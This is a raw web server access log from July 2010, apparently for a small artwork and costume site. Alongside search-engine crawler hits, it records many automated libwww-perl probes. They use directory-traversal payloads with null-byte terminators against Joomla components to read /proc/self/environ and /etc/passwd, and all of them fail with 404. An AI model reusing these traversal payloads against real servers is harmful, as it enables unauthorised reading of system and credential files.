208.115.111.248 - - [09/Jul/2010:03:03:55 -0500] "GET /logs/access_log.1265760000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
65.254.36.102 - - [09/Jul/2010:03:04:07 -0500] "GET /logs/access_log.1276905600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
217.159.130.74 - - [09/Jul/2010:03:05:23 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.199.179 - - [09/Jul/2010:03:12:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.159.130.74 - - [09/Jul/2010:03:13:25 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.250.255.243 - - [09/Jul/2010:03:14:42 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.51.110 - - [09/Jul/2010:03:16:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.101.148.126 - - [09/Jul/2010:03:17:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [09/Jul/2010:03:17:22 -0500] "GET /logs/access_log.1218585600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
67.195.112.232 - - [09/Jul/2010:03:19:59 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.159.130.74 - - [09/Jul/2010:03:21:35 -0500] "GET /logs/access_log.1277510400/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:21:35 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:21:36 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:22:27 -0500] "GET /logs/access_log.1277510400/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:22:28 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:22:28 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:23:23 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.125.217.43 - - [09/Jul/2010:03:24:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)"
91.125.217.43 - - [09/Jul/2010:03:24:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)"
217.159.130.74 - - [09/Jul/2010:03:33:21 -0500] "GET /logs/access_log.1277510400/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:33:22 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:33:22 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:34:00 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:40:05 -0500] "GET /logs/access_log.1277683200/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:40:06 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:40:06 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:40:39 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:40:40 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:38 -0500] "GET /logs/access_log.1276732800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:38 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:39 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:49 -0500] "GET /logs/access_log.1277424000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:51 -0500] "GET /logs/access_log.1276732800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:51 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:41:51 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:42:00 -0500] "GET /logs/access_log.1277424000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:42:11 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
93.190.48.203 - - [09/Jul/2010:03:43:40 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:43:41 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:43:56 -0500] "GET /logs/access_log.1277078400//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:43:56 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:43:56 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:44:05 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:44:07 -0500] "GET /logs/access_log.1276819200//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:44:08 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:14 -0500] "GET /logs/access_log.1276732800//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:15 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:15 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:15 -0500] "GET /logs/access_log.1276819200//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:20 -0500] "GET /logs/access_log.1275782400//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:20 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:20 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:21 -0500] "GET /logs/access_log.1275609600//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:45:28 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:46:10 -0500] "GET /logs/access_log.1275782400//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:46:10 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:46:10 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:46:59 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:47:00 -0500] "GET /logs/access_log.1275696000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:47:33 -0500] "GET /logs/access_log.1275782400//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:47:33 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:47:34 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:47:35 -0500] "GET /logs/access_log.1277078400//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.250.255.243 - - [09/Jul/2010:03:49:07 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
91.121.144.61 - - [09/Jul/2010:03:50:09 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:50:11 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
93.190.48.203 - - [09/Jul/2010:03:53:45 -0500] "GET /logs/access_log.1275782400//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:53:45 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:53:46 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:03:53:48 -0500] "GET /logs/access_log.1275696000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.144.61 - - [09/Jul/2010:03:57:50 -0500] "GET /logs/access_log.1277251200//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:57:50 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:57:50 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:57:54 -0500] "GET /logs/access_log.1277251200//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:57:55 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.144.61 - - [09/Jul/2010:03:57:55 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.46.194.39 - - [09/Jul/2010:04:03:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.39 - - [09/Jul/2010:04:03:19 -0500] "GET /artwork/jewelrybox-opera1.jpg HTTP/1.1" 200 49813 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
62.44.123.3 - - [09/Jul/2010:04:19:31 -0500] "GET /logs/access_log.1275609600//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:31 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:31 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:32 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:32 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:33 -0500] "GET /logs/access_log.1275609600//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:33 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:33 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:34 -0500] "GET /logs/access_log.1275609600//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:19:36 -0500] "GET /logs/access_log.1275782400//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:04:19:55 -0500] "GET /logs/access_log.1199145600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.123.3 - - [09/Jul/2010:04:20:29 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:20:29 -0500] "GET /logs/access_log.1275609600//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:20:31 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:20:32 -0500] "GET /logs/access_log.1275782400//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:20:34 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:20:34 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:20:36 -0500] "GET /logs/access_log.1275782400//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:11 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:12 -0500] "GET /logs/access_log.1275609600//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:16 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:17 -0500] "GET /logs/access_log.1275782400//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:47 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:49 -0500] "GET /logs/access_log.1275782400//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:04:21:50 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [09/Jul/2010:04:25:27 -0500] "GET /logs/access_log.1277164800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
74.165.167.39 - - [09/Jul/2010:04:32:34 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)"
